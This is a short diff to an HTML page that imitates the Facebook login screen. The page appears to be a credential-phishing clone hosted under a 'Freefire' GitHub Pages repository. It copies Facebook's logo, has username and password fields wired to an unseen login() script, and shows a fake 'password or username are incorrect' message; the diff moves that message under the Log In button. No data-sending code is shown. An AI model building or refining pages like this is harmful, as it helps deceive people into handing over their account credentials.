--- a/facebook/index.html
+++ b/facebook/index.html
@@ -117,7 +117,7 @@
 </head>
 <body>
     <script src="script.js"></script>
-    <div class="msg"id="msg"style="color:red;display:none;"><p>Your password or username are incorrect</p></div>
+    
     <div style="position:fixed;top:5px;">
         <center><img src='https://sharmapushkar-coder.github.io/Freefire/facebook.svg'title="Facebook-logo-svg"style="width:120px;100px;"></center>
     </div>
@@ -134,6 +134,8 @@
                     <input type="password" id="pass" name="password" required>
                 </div>
                 <button onclick="login()">Log In</button>
+                <br><br>
+                <b id="msg"style="color:red;display:none;">Your password or username are incorrect</div></b>
                 <div class="forgot-password">
                     <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgot password?</a>
                 </div>
